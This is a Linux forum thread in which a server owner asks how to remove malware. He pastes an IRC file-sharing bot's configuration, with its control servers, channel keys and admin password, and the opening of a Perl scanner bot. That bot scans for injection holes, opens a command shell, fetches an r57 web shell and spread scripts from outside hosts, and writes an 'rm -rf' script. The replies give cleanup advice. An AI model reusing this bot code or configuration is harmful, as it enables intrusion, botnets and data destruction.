Find the answer to your Linux question:
Results 1 to 6 of 6
Hello, I have big problem. I have server at ThePlanet and in last several days (maybe weeks) I sometime see in bandwith graph that link of 10mb/s is 100% used, ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Apr 2008
    Posts
    15

    My server is hacked, some IRC script...


    Hello,

    I have big problem. I have server at ThePlanet and in last several days (maybe weeks) I sometime see in bandwith graph that link of 10mb/s is 100% used, see http://img144.imageshack.us/img144/9...gimgphpvi3.png
    Than I see in var/tmp and find some bad code, maybe script in which are some hacker email addresses and some IPs. In some file I see and some IRC script and on net find that script is for IRC download or some similary.

    This is example of one file

    pidfile .s
    logfile .f
    logstats no
    logrotate weekly
    statefile .lib.css
    xdcclistfile .lib.css~


    connectionmethod direct
    server 72.20.54.69 9000
    server 194.169.192.55 9000
    server 71.6.216.111 9000
    server 72.20.54.69 31967
    server 72.20.54.69 27397
    server 72.20.54.69 48618
    server 72.20.54.69 55493
    server 71.6.216.111 65267

    channel #ADD!KT!VE -plist 29 -key iNSOMNiA
    channel #ADD!KT-test -plist 60 -key PRiVATE

    nickserv_pass thu64l1f3

    user_nick [EU]-N3W
    user_realname 14,1# 14,1ADD4!14KT4!14VE
    user_modes +iB
    loginname FAST
    #usenatip 78.31.115.159


    slotsmax 15
    queuesize 30
    maxtransfersperperson 2
    maxqueueditemsperperson 3
    respondtochannelxdcc
    downloadhost *!*@*

    #headline 8,1welcome to everyone

    creditline 14,1ADD4!14KT4!14VE


    adminpass zBOTEinWEdNwI
    adminhost mdma!*@global-threat.us
    adminhost elmer*!*@elmer.wabbits.us
    adminhost CHR0NiC!*@addikt-help.us
    adminhost CHRONiC!*@addikt-help.us
    adminhost WEED!*@*.addikt-help.us

    uploadhost *!*@dean*.EsylumWarez.Net
    uploadhost *!*@bobby811.EsylumWarez.Net
    uploadhost mdma!*@global-threat.us
    uploadhost elmer*!*@elmer.wabbits.us
    uploadhost CHR0NiC*!*@addikt-help.us
    uploadhost CHRONiC*!*@addikt-help.us
    uploadhost WEED!*@*.addikt-help.us
    uploadhost [EU]*!*@*
    uploadhost [US]*!*@*
    uploadhost [DiSTRO]*!*@*
    uploadhost [KR]*!*@*

    uploaddir /var/tmp/.lib
    filedir /var/tmp/.lib
    notifytime 10
    nomd5sum
    Too and some other files, example begining of one:

    #!/usr/bin/perl

    ################################################## ###################################
    ## ##
    ## ##
    ## 04/04/2008 ##
    ## Author : Osirys ##
    ## Team : Third Eye Security ##
    ## Ircd : 84.19.176.186 ##
    ## WebSite : ##
    ## Contact : osirys[at]live[dot]it ##
    ## ##
    ## ## IMPORTANT ## ##
    ## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ##
    ## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ##
    ## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR ##
    ## # SYSTEM MORE SECURE. ##
    ## ## ##
    ## ##
    ## Release: v5 Private ##
    ## I coded this tool only for fun , anyway it works well ! This is a Private ##
    ## Release, so if you have this Script, please, take care, and don't give it ##
    ## anyone ! Thank you. ##
    ## It's a IrcBot. So, after connecting on your Ircd, you can scan for RFI, ##
    ## LFI, SQL Injection on sites using dorks. ##
    ## Anyway, u may know, that this one is the better bot ever created ! ##
    ## Be happy ! ##
    ## ##
    ## Features: ##
    ## [+]Sql Injection Scanner ##
    ## [+]Remote File Inclusion Scanner ##
    ## [+]Local File Inclusion Scanner ##
    ## [+]Integrated Shell, so you can execute commands on the server ##
    ## [+]Security Mode to protect "dangerous" functions ##
    ## [+]Spread Mode, to activate or disable Spread Function ##
    ## [+]Bypass Engines ON: Google, Yahoo ##
    ## !: To "bypass" these engines, the Scanner just looks for websites on other ##
    ## engines that use the same bots than the main ones ##
    ## ##
    ## ##
    ################################################## ###################################



    ### !!_/ PRIVATE

    use IO::Socket::INET;
    use HTTP::Request;
    use LWP::UserAgent;

    ################################################## #####
    ## CONFIGURATION //
    ################################################## #####


    my $id = "http://rawcraft.info/spread.txt??"; #Your RFI Response
    my $shell = "http://r99.li/r57.txt??"; #Shell printed on the Vulnerable Site
    my $ircd = "irc.indoirc.net";
    my $port = "6667";
    my $chan1 = "#fntsze.biz"; #Chan for Scan
    my $chan2 = ""; #bot will be printed here too
    my $nick="fntsze[".int(rand(1000))."]"; # Scanner Nickname
    my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
    # (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
    # Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
    my $rfipidpr0c = 50;

    ### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

    my $spread = "http://rawcraft.info/t.txt???";

    my $spreadACT = 1; #0 ->disabled, 1 ->enabled
    my $securityACT = 1; #0 ->disabled, 1 ->enabled

    my $killpwd = "****off"; #Password to Kill the Bot
    my $chidpwd = "****off"; #Password to change the RFI Response
    my $cmdpwd = "****off"; #Password to execute commands on the server
    my $secpwd = "****off";
    my $spreadpwd = "****off";

    my $badspreadpwd != $spreadpwd;
    my $badkillpwd != $killpwd;
    my $badidpwd != $chidpwd;
    my $badcmdpwd =! $cmdpwd;


    ################################################## #####
    ## END OF CONFIGURATION //
    ################################################## #####

    open( $f1le, ">", "rm.txt" );
    print $f1le "\#!/usr/bin/perl\n";
    print $f1le "exec(\"rm -rf \*siti\*\")\;\n";
    close $f1le;
    etc...
    Do anybody have experience with this, how I to clean my server?

    Thank you very much, Mladen

  2. #2
    Just Joined!
    Join Date
    Apr 2008
    Posts
    15
    Uf, I mistake forum category, please move it into security forum.


    One friend tell me that i have IRC bot into my server, but didnt tell me how to disable and remove it. It is perl script.

    Can you tell me how to do this?

  3. #3
    Just Joined!
    Join Date
    Sep 2007
    Location
    Lafayette, IN
    Posts
    83
    There are three things you need to do:

    1. Eliminate the problem
    2. Prevent the problem
    3. Resume operations

    To do part 1, the easiest way is to just delete the files. The trick here is finding all the files that need to be deleted. You should probably run chkrootkit (chkrootkit -- locally checks for signs of a rootkit) as well.

    For part 2, you need to figure out how this happened in the first place. Did you or another user download the code? Do you have the latest patches for your OS and applications installed? Are you using a firewall? Once you've figured out how this IRC bot got installed, you can prevent it from happening in the future.

    For part 3, if it's just a simple IRC bot, there's not much you need to do. However, it is hard to be sure if other things may have been changed as well (for example, the root password, firewall settings, etc). Honestly, your best bet is to find a backup from before this happened, and re-install.

  4. #4
    Linux Guru smolloy's Avatar
    Join Date
    Apr 2005
    Location
    CA, but from N.Ireland
    Posts
    2,414
    This is indeed an IRC bot, but Ben Cotton's advice is good.

    Eliminating this one problem is easy -- you can just delete the files -- but you have a bigger problem on your hands. Someone nasty knows how to get into and operate your server. If you don't fix this problem, then they'll simply reinstall their bot.

    In this case my advice is always the same (and the same as Ben's). Clean reinstall.

    Hopefully you have some backups from before your system was compromised.
    Registered Linux user #388328 || Registered LFS user #15880
    AMD 64 X2 4600+ :: 2X1GB DDR2 800 :: GeForce 9400 GT 512MB :: ASUS M2N32 Deluxe :: 4X250GB SATAII
    Need instant help? Try us on IRC -- #linuxforums on freenode

  5. #5
    Just Joined!
    Join Date
    Jun 2009
    Posts
    1

    "ircbot"

    That is not a ircbot its a script for a UNIX|Scanner
    its for scanning for sites to "infect" with a unix bot for DDoS Attacks.. wich is used for hitting off websites and or a normal connection.. if you do this any type of DDoS attacking i would NOT be posting a scanner showing you have tools like this even if you didnt add it to your server .. wich thats kinda odd bc it can only be added from the root user. using SSH. you might wanna remove it from this site showing you have it on your server.. bc it pretty much makes your irc a Botnet. and you showing others you have a botnet pretty much.

  6. #6
    Linux Guru Rubberman's Avatar
    Join Date
    Apr 2009
    Location
    I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
    Posts
    11,558
    Whatever you do, when you reimage your system, or clean it out, make sure you remove all unknown user accounts and change the password on all of the remaining ones. Then restrict SSH access, or disable it altogether. Also, configure your firewall more robustly. If you can, you could install SElinux to have a more secure foundation system.
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •